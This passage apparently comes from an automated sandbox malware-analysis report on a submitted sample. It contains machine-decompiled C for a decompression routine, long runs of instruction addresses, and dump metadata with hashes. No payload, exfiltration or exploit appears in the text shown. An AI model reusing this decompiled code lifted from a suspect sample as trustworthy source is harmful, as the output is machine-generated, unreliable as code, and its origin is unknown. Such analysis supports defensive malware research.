													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                                0x00000000
                                                                                                                0x004063d0
                                                                                                                0x004063d0
                                                                                                                0x004063d4
                                                                                                                0x004063f5
                                                                                                                0x004063fc
                                                                                                                0x00406402
                                                                                                                0x00406408
                                                                                                                0x0040641a
                                                                                                                0x00406420
                                                                                                                0x00406425
                                                                                                                0x00000000
                                                                                                                0x004063d6
                                                                                                                0x004063dc
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x004067a0
                                                                                                                0x004067a0
                                                                                                                0x004067a0
                                                                                                                0x004067a6
                                                                                                                0x004067ac
                                                                                                                0x004067b2
                                                                                                                0x004067cc
                                                                                                                0x004067cf
                                                                                                                0x004067d5
                                                                                                                0x004067e0
                                                                                                                0x004067e2
                                                                                                                0x004067b4
                                                                                                                0x004067b4
                                                                                                                0x004067c3
                                                                                                                0x004067c7
                                                                                                                0x004067c7
                                                                                                                0x004067ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004067ee
                                                                                                                0x004067f2
                                                                                                                0x004069a1
                                                                                                                0x004069b7
                                                                                                                0x004069bf
                                                                                                                0x004069c6
                                                                                                                0x004069c8
                                                                                                                0x004069cf
                                                                                                                0x004069d3
                                                                                                                0x004069d3
                                                                                                                0x004067fe
                                                                                                                0x00406805
                                                                                                                0x0040680d
                                                                                                                0x00406810
                                                                                                                0x00406813
                                                                                                                0x00406813
                                                                                                                0x00406819
                                                                                                                0x00406819
                                                                                                                0x00405fb5
                                                                                                                0x00405fb5
                                                                                                                0x00405fb5
                                                                                                                0x00405fbe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4
                                                                                                                0x00000000
                                                                                                                0x00405fcf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fd8
                                                                                                                0x00405fdb
                                                                                                                0x00405fde
                                                                                                                0x00405fe2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fe8
                                                                                                                0x00405feb
                                                                                                                0x00405fed
                                                                                                                0x00405fee
                                                                                                                0x00405ff1
                                                                                                                0x00405ff3
                                                                                                                0x00405ff4
                                                                                                                0x00405ff6
                                                                                                                0x00405ff9
                                                                                                                0x00405ffe
                                                                                                                0x00406003
                                                                                                                0x0040600c
                                                                                                                0x0040601f
                                                                                                                0x00406022
                                                                                                                0x0040602e
                                                                                                                0x00406056
                                                                                                                0x00406058
                                                                                                                0x00406066
                                                                                                                0x00406066
                                                                                                                0x0040606a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040605a
                                                                                                                0x0040605a
                                                                                                                0x0040605d
                                                                                                                0x0040605e
                                                                                                                0x0040605e
                                                                                                                0x00000000
                                                                                                                0x0040605a
                                                                                                                0x00406034
                                                                                                                0x00406039
                                                                                                                0x00406039
                                                                                                                0x00406042
                                                                                                                0x0040604a
                                                                                                                0x0040604d
                                                                                                                0x00000000
                                                                                                                0x00406053
                                                                                                                0x00406053
                                                                                                                0x00000000
                                                                                                                0x00406053
                                                                                                                0x00000000
                                                                                                                0x00406070
                                                                                                                0x00406070
                                                                                                                0x00406074
                                                                                                                0x00406920
                                                                                                                0x00000000
                                                                                                                0x00406920
                                                                                                                0x0040607d
                                                                                                                0x0040608d
                                                                                                                0x00406090
                                                                                                                0x00406093
                                                                                                                0x00406093
                                                                                                                0x00406093
                                                                                                                0x00406096
                                                                                                                0x0040609a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040609c
                                                                                                                0x004060a2
                                                                                                                0x004060cc
                                                                                                                0x004060d2
                                                                                                                0x004060d9
                                                                                                                0x00000000
                                                                                                                0x004060d9
                                                                                                                0x004060a8
                                                                                                                0x004060ab
                                                                                                                0x004060b0
                                                                                                                0x004060b0
                                                                                                                0x004060bb
                                                                                                                0x004060c3
                                                                                                                0x004060c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040610b
                                                                                                                0x00406111
                                                                                                                0x00406114
                                                                                                                0x00406121
                                                                                                                0x00406129
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004060e0
                                                                                                                0x004060e0
                                                                                                                0x004060e4
                                                                                                                0x0040692f
                                                                                                                0x00000000
                                                                                                                0x0040692f
                                                                                                                0x004060f0
                                                                                                                0x004060fb
                                                                                                                0x004060fb
                                                                                                                0x004060fb
                                                                                                                0x004060fe
                                                                                                                0x00406101
                                                                                                                0x00406104
                                                                                                                0x00406109
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004067a0
                                                                                                                0x004067a0
                                                                                                                0x004067a6
                                                                                                                0x004067ac
                                                                                                                0x004067b2
                                                                                                                0x004067cc
                                                                                                                0x004067cf
                                                                                                                0x004067d5
                                                                                                                0x004067e0
                                                                                                                0x004067e2
                                                                                                                0x004067b4
                                                                                                                0x004067b4
                                                                                                                0x004067c3
                                                                                                                0x004067c7
                                                                                                                0x004067c7
                                                                                                                0x004067ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406131
                                                                                                                0x00406133
                                                                                                                0x00406136
                                                                                                                0x004061a7
                                                                                                                0x004061aa
                                                                                                                0x004061ad
                                                                                                                0x004061b4
                                                                                                                0x004061be
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x00406138
                                                                                                                0x0040613c
                                                                                                                0x0040613f
                                                                                                                0x00406141
                                                                                                                0x00406144
                                                                                                                0x00406147
                                                                                                                0x00406149
                                                                                                                0x0040614c
                                                                                                                0x0040614e
                                                                                                                0x00406153
                                                                                                                0x00406156
                                                                                                                0x00406159
                                                                                                                0x0040615d
                                                                                                                0x00406164
                                                                                                                0x00406167
                                                                                                                0x0040616e
                                                                                                                0x00406172
                                                                                                                0x0040617a
                                                                                                                0x0040617a
                                                                                                                0x0040617a
                                                                                                                0x00406174
                                                                                                                0x00406174
                                                                                                                0x00406174
                                                                                                                0x00406169
                                                                                                                0x00406169
                                                                                                                0x00406169
                                                                                                                0x0040617e
                                                                                                                0x00406181
                                                                                                                0x0040619f
                                                                                                                0x004061a1
                                                                                                                0x00000000
                                                                                                                0x00406183
                                                                                                                0x00406183
                                                                                                                0x00406186
                                                                                                                0x00406189
                                                                                                                0x0040618c
                                                                                                                0x0040618e
                                                                                                                0x0040618e
                                                                                                                0x0040618e
                                                                                                                0x00406191
                                                                                                                0x00406194
                                                                                                                0x00406196
                                                                                                                0x00406197
                                                                                                                0x0040619a
                                                                                                                0x00000000
                                                                                                                0x0040619a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040643a
                                                                                                                0x0040643e
                                                                                                                0x00406461
                                                                                                                0x00406464
                                                                                                                0x00406467
                                                                                                                0x00406471
                                                                                                                0x00406440
                                                                                                                0x00406440
                                                                                                                0x00406443
                                                                                                                0x00406446
                                                                                                                0x00406449
                                                                                                                0x00406456
                                                                                                                0x00406459
                                                                                                                0x00406459
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040647d
                                                                                                                0x00406481
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406487
                                                                                                                0x0040648b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406491
                                                                                                                0x00406493
                                                                                                                0x00406497
                                                                                                                0x00406497
                                                                                                                0x0040649a
                                                                                                                0x0040649e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004064ee
                                                                                                                0x004064f2
                                                                                                                0x004064f9
                                                                                                                0x004064fc
                                                                                                                0x004064ff
                                                                                                                0x00406509
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x004064f4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406515
                                                                                                                0x00406519
                                                                                                                0x00406520
                                                                                                                0x00406523
                                                                                                                0x00406526
                                                                                                                0x0040651b
                                                                                                                0x0040651b
                                                                                                                0x0040651b
                                                                                                                0x00406529
                                                                                                                0x0040652c
                                                                                                                0x0040652f
                                                                                                                0x0040652f
                                                                                                                0x00406532
                                                                                                                0x00406535
                                                                                                                0x00406538
                                                                                                                0x00406538
                                                                                                                0x0040653b
                                                                                                                0x00406542
                                                                                                                0x00406547
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004065d5
                                                                                                                0x004065d5
                                                                                                                0x004065d9
                                                                                                                0x00406977
                                                                                                                0x00000000
                                                                                                                0x00406977
                                                                                                                0x004065df
                                                                                                                0x004065e2
                                                                                                                0x004065e5
                                                                                                                0x004065e9
                                                                                                                0x004065ec
                                                                                                                0x004065f2
                                                                                                                0x004065f4
                                                                                                                0x004065f4
                                                                                                                0x004065f4
                                                                                                                0x004065f7
                                                                                                                0x004065fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004061ca
                                                                                                                0x004061ca
                                                                                                                0x004061ce
                                                                                                                0x0040693b
                                                                                                                0x00000000
                                                                                                                0x0040693b
                                                                                                                0x004061d4
                                                                                                                0x004061d7
                                                                                                                0x004061da
                                                                                                                0x004061de
                                                                                                                0x004061e1
                                                                                                                0x004061e7
                                                                                                                0x004061e9
                                                                                                                0x004061e9
                                                                                                                0x004061e9
                                                                                                                0x004061ec
                                                                                                                0x004061ef
                                                                                                                0x004061ef
                                                                                                                0x004061f2
                                                                                                                0x004061f5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004061fb
                                                                                                                0x00406201
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406207
                                                                                                                0x00406207
                                                                                                                0x0040620b
                                                                                                                0x0040620e
                                                                                                                0x00406211
                                                                                                                0x00406214
                                                                                                                0x00406217
                                                                                                                0x00406218
                                                                                                                0x0040621b
                                                                                                                0x0040621d
                                                                                                                0x00406223
                                                                                                                0x00406226
                                                                                                                0x00406229
                                                                                                                0x0040622c
                                                                                                                0x0040622f
                                                                                                                0x00406232
                                                                                                                0x00406235
                                                                                                                0x00406251
                                                                                                                0x00406254
                                                                                                                0x00406257
                                                                                                                0x0040625a
                                                                                                                0x00406261
                                                                                                                0x00406265
                                                                                                                0x00406267
                                                                                                                0x0040626b
                                                                                                                0x00406237
                                                                                                                0x00406237
                                                                                                                0x0040623b
                                                                                                                0x00406243
                                                                                                                0x00406248
                                                                                                                0x0040624a
                                                                                                                0x0040624c
                                                                                                                0x0040624c
                                                                                                                0x0040626e
                                                                                                                0x00406275
                                                                                                                0x00406278
                                                                                                                0x00000000
                                                                                                                0x0040627e
                                                                                                                0x00000000
                                                                                                                0x0040627e
                                                                                                                0x00000000
                                                                                                                0x00406283
                                                                                                                0x00406283
                                                                                                                0x00406287
                                                                                                                0x00406947
                                                                                                                0x00000000
                                                                                                                0x00406947
                                                                                                                0x0040628d
                                                                                                                0x00406290
                                                                                                                0x00406293
                                                                                                                0x00406297
                                                                                                                0x0040629a
                                                                                                                0x004062a0
                                                                                                                0x004062a2
                                                                                                                0x004062a2
                                                                                                                0x004062a2
                                                                                                                0x004062a5
                                                                                                                0x004062a8
                                                                                                                0x004062a8
                                                                                                                0x004062a8
                                                                                                                0x004062ae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004062b0
                                                                                                                0x004062b3
                                                                                                                0x004062b6
                                                                                                                0x004062b9
                                                                                                                0x004062bc
                                                                                                                0x004062bf
                                                                                                                0x004062c2
                                                                                                                0x004062c5
                                                                                                                0x004062c8
                                                                                                                0x004062cb
                                                                                                                0x004062ce
                                                                                                                0x004062e6
                                                                                                                0x004062e9
                                                                                                                0x004062ec
                                                                                                                0x004062ef
                                                                                                                0x004062ef
                                                                                                                0x004062f2
                                                                                                                0x004062f6
                                                                                                                0x004062f8
                                                                                                                0x004062d0
                                                                                                                0x004062d0
                                                                                                                0x004062d8
                                                                                                                0x004062dd
                                                                                                                0x004062df
                                                                                                                0x004062e1
                                                                                                                0x004062e1
                                                                                                                0x004062fb
                                                                                                                0x00406302
                                                                                                                0x00406305
                                                                                                                0x00000000
                                                                                                                0x00406307
                                                                                                                0x00000000
                                                                                                                0x00406307
                                                                                                                0x00406305
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406347
                                                                                                                0x00406347
                                                                                                                0x0040634b
                                                                                                                0x00406953
                                                                                                                0x00000000
                                                                                                                0x00406953
                                                                                                                0x00406351
                                                                                                                0x00406354
                                                                                                                0x00406357
                                                                                                                0x0040635b
                                                                                                                0x0040635e
                                                                                                                0x00406364
                                                                                                                0x00406366
                                                                                                                0x00406366
                                                                                                                0x00406366
                                                                                                                0x00406369
                                                                                                                0x0040636c
                                                                                                                0x0040636c
                                                                                                                0x00406372
                                                                                                                0x00406310
                                                                                                                0x00406310
                                                                                                                0x00406313
                                                                                                                0x00000000
                                                                                                                0x00406313
                                                                                                                0x00406374
                                                                                                                0x00406374
                                                                                                                0x00406377
                                                                                                                0x0040637a
                                                                                                                0x0040637d
                                                                                                                0x00406380
                                                                                                                0x00406383
                                                                                                                0x00406386
                                                                                                                0x00406389
                                                                                                                0x0040638c
                                                                                                                0x0040638f
                                                                                                                0x00406392
                                                                                                                0x004063aa
                                                                                                                0x004063ad
                                                                                                                0x004063b0
                                                                                                                0x004063b3
                                                                                                                0x004063b3
                                                                                                                0x004063b6
                                                                                                                0x004063ba
                                                                                                                0x004063bc
                                                                                                                0x00406394
                                                                                                                0x00406394
                                                                                                                0x0040639c
                                                                                                                0x004063a1
                                                                                                                0x004063a3
                                                                                                                0x004063a5
                                                                                                                0x004063a5
                                                                                                                0x004063bf
                                                                                                                0x004063c6
                                                                                                                0x004063c9
                                                                                                                0x00000000
                                                                                                                0x004063cb
                                                                                                                0x00000000
                                                                                                                0x004063cb
                                                                                                                0x00000000
                                                                                                                0x00406658
                                                                                                                0x00406658
                                                                                                                0x0040665c
                                                                                                                0x00406983
                                                                                                                0x00000000
                                                                                                                0x00406983
                                                                                                                0x00406662
                                                                                                                0x00406665
                                                                                                                0x00406668
                                                                                                                0x0040666c
                                                                                                                0x0040666f
                                                                                                                0x00406675
                                                                                                                0x00406677
                                                                                                                0x00406677
                                                                                                                0x00406677
                                                                                                                0x0040667a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406428
                                                                                                                0x00406428
                                                                                                                0x0040642b
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x00406767
                                                                                                                0x0040676b
                                                                                                                0x0040678d
                                                                                                                0x00406790
                                                                                                                0x0040679a
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040676d
                                                                                                                0x00406770
                                                                                                                0x00406774
                                                                                                                0x00406777
                                                                                                                0x00406777
                                                                                                                0x0040677a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406824
                                                                                                                0x00406828
                                                                                                                0x00406846
                                                                                                                0x00406846
                                                                                                                0x00406846
                                                                                                                0x0040684d
                                                                                                                0x00406854
                                                                                                                0x0040685b
                                                                                                                0x0040685b
                                                                                                                0x00000000
                                                                                                                0x0040685b
                                                                                                                0x0040682a
                                                                                                                0x0040682d
                                                                                                                0x00406830
                                                                                                                0x00406833
                                                                                                                0x0040683a
                                                                                                                0x0040677e
                                                                                                                0x0040677e
                                                                                                                0x00406781
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406915
                                                                                                                0x00406918
                                                                                                                0x00406819
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040654f
                                                                                                                0x00406551
                                                                                                                0x00406558
                                                                                                                0x00406559
                                                                                                                0x0040655b
                                                                                                                0x0040655e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406566
                                                                                                                0x00406569
                                                                                                                0x0040656c
                                                                                                                0x0040656e
                                                                                                                0x00406570
                                                                                                                0x00406570
                                                                                                                0x00406571
                                                                                                                0x00406574
                                                                                                                0x0040657b
                                                                                                                0x0040657e
                                                                                                                0x0040658c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406862
                                                                                                                0x00406862
                                                                                                                0x00406865
                                                                                                                0x0040686c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406871
                                                                                                                0x00406871
                                                                                                                0x00406875
                                                                                                                0x004069ad
                                                                                                                0x00000000
                                                                                                                0x004069ad
                                                                                                                0x0040687b
                                                                                                                0x0040687e
                                                                                                                0x00406881
                                                                                                                0x00406885
                                                                                                                0x00406888
                                                                                                                0x0040688e
                                                                                                                0x00406890
                                                                                                                0x00406890
                                                                                                                0x00406890
                                                                                                                0x00406893
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406899
                                                                                                                0x00406899
                                                                                                                0x0040689d
                                                                                                                0x004068fd
                                                                                                                0x00406900
                                                                                                                0x00406905
                                                                                                                0x00406906
                                                                                                                0x00406908
                                                                                                                0x0040690a
                                                                                                                0x0040690d
                                                                                                                0x00406819
                                                                                                                0x00406819
                                                                                                                0x00000000
                                                                                                                0x0040681f
                                                                                                                0x00406819
                                                                                                                0x0040689f
                                                                                                                0x004068a5
                                                                                                                0x004068a8
                                                                                                                0x004068ab
                                                                                                                0x004068ae
                                                                                                                0x004068b1
                                                                                                                0x004068b4
                                                                                                                0x004068b7
                                                                                                                0x004068ba
                                                                                                                0x004068bd
                                                                                                                0x004068c0
                                                                                                                0x004068d9
                                                                                                                0x004068dc
                                                                                                                0x004068df
                                                                                                                0x004068e2
                                                                                                                0x004068e6
                                                                                                                0x004068e8
                                                                                                                0x004068e8
                                                                                                                0x004068e9
                                                                                                                0x004068ec
                                                                                                                0x004068c2
                                                                                                                0x004068c2
                                                                                                                0x004068ca
                                                                                                                0x004068cf
                                                                                                                0x004068d1
                                                                                                                0x004068d4
                                                                                                                0x004068d4
                                                                                                                0x004068ef
                                                                                                                0x004068f6
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x00406594
                                                                                                                0x00406597
                                                                                                                0x004065cd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x00406700
                                                                                                                0x00406700
                                                                                                                0x00406703
                                                                                                                0x00406705
                                                                                                                0x0040698f
                                                                                                                0x00000000
                                                                                                                0x0040698f
                                                                                                                0x0040670b
                                                                                                                0x0040670e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406714
                                                                                                                0x00406718
                                                                                                                0x0040671b
                                                                                                                0x0040671b
                                                                                                                0x0040671b
                                                                                                                0x00000000
                                                                                                                0x0040671b
                                                                                                                0x00406599
                                                                                                                0x0040659b
                                                                                                                0x0040659d
                                                                                                                0x0040659f
                                                                                                                0x004065a2
                                                                                                                0x004065a3
                                                                                                                0x004065a5
                                                                                                                0x004065a7
                                                                                                                0x004065aa
                                                                                                                0x004065ad
                                                                                                                0x004065c3
                                                                                                                0x004065c8
                                                                                                                0x00406600
                                                                                                                0x00406600
                                                                                                                0x00406604
                                                                                                                0x00406630
                                                                                                                0x00406632
                                                                                                                0x00406639
                                                                                                                0x0040663c
                                                                                                                0x0040663f
                                                                                                                0x0040663f
                                                                                                                0x00406644
                                                                                                                0x00406644
                                                                                                                0x00406646
                                                                                                                0x00406649
                                                                                                                0x00406650
                                                                                                                0x00406653
                                                                                                                0x00406680
                                                                                                                0x00406680
                                                                                                                0x00406683
                                                                                                                0x00406686
                                                                                                                0x004066fa
                                                                                                                0x004066fa
                                                                                                                0x004066fa
                                                                                                                0x00000000
                                                                                                                0x004066fa
                                                                                                                0x00406688
                                                                                                                0x0040668e
                                                                                                                0x00406691
                                                                                                                0x00406694
                                                                                                                0x00406697
                                                                                                                0x0040669a
                                                                                                                0x0040669d
                                                                                                                0x004066a0
                                                                                                                0x004066a3
                                                                                                                0x004066a6
                                                                                                                0x004066a9
                                                                                                                0x004066c2
                                                                                                                0x004066c4
                                                                                                                0x004066c7
                                                                                                                0x004066c8
                                                                                                                0x004066cb
                                                                                                                0x004066cd
                                                                                                                0x004066d0
                                                                                                                0x004066d2
                                                                                                                0x004066d4
                                                                                                                0x004066d7
                                                                                                                0x004066d9
                                                                                                                0x004066dc
                                                                                                                0x004066e0
                                                                                                                0x004066e2
                                                                                                                0x004066e2
                                                                                                                0x004066e3
                                                                                                                0x004066e6
                                                                                                                0x004066e9
                                                                                                                0x004066ab
                                                                                                                0x004066ab
                                                                                                                0x004066b3
                                                                                                                0x004066b8
                                                                                                                0x004066ba
                                                                                                                0x004066bd
                                                                                                                0x004066bd
                                                                                                                0x004066ec
                                                                                                                0x004066f3
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x004066f3
                                                                                                                0x00406606
                                                                                                                0x00406609
                                                                                                                0x0040660b
                                                                                                                0x0040660e
                                                                                                                0x00406611
                                                                                                                0x00406614
                                                                                                                0x00406616
                                                                                                                0x00406619
                                                                                                                0x0040661c
                                                                                                                0x0040661c
                                                                                                                0x0040661f
                                                                                                                0x0040661f
                                                                                                                0x00406622
                                                                                                                0x00406629
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00406629
                                                                                                                0x004065af
                                                                                                                0x004065b2
                                                                                                                0x004065b4
                                                                                                                0x004065b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406316
                                                                                                                0x00406316
                                                                                                                0x0040631a
                                                                                                                0x0040695f
                                                                                                                0x00000000
                                                                                                                0x0040695f
                                                                                                                0x00406320
                                                                                                                0x00406323
                                                                                                                0x00406326
                                                                                                                0x00406329
                                                                                                                0x0040632c
                                                                                                                0x0040632f
                                                                                                                0x00406332
                                                                                                                0x00406334
                                                                                                                0x00406337
                                                                                                                0x0040633a
                                                                                                                0x0040633d
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004064a1
                                                                                                                0x004064a1
                                                                                                                0x004064a5
                                                                                                                0x0040696b
                                                                                                                0x00000000
                                                                                                                0x0040696b
                                                                                                                0x004064ab
                                                                                                                0x004064ae
                                                                                                                0x004064b1
                                                                                                                0x004064b4
                                                                                                                0x004064b6
                                                                                                                0x004064b6
                                                                                                                0x004064b6
                                                                                                                0x004064b9
                                                                                                                0x004064bc
                                                                                                                0x004064bf
                                                                                                                0x004064c2
                                                                                                                0x004064c5
                                                                                                                0x004064c8
                                                                                                                0x004064c9
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064ce
                                                                                                                0x004064d1
                                                                                                                0x004064d4
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064da
                                                                                                                0x004064dc
                                                                                                                0x004064dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x00406722
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406728
                                                                                                                0x0040672b
                                                                                                                0x0040672e
                                                                                                                0x00406731
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406736
                                                                                                                0x00406739
                                                                                                                0x0040673c
                                                                                                                0x0040673f
                                                                                                                0x00406742
                                                                                                                0x00406745
                                                                                                                0x00406746
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x0040674b
                                                                                                                0x0040674e
                                                                                                                0x00406751
                                                                                                                0x00406754
                                                                                                                0x00406757
                                                                                                                0x0040675b
                                                                                                                0x0040675d
                                                                                                                0x00406760
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x004064df
                                                                                                                0x004064df
                                                                                                                0x00000000
                                                                                                                0x004064df
                                                                                                                0x00406760
                                                                                                                0x00406995
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4
                                                                                                                0x004069cc
                                                                                                                0x004069cc
                                                                                                                0x00000000
                                                                                                                0x004069cc
                                                                                                                0x00406819
                                                                                                                0x004067a0
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x004063d4

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                                • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                                                • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                                • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
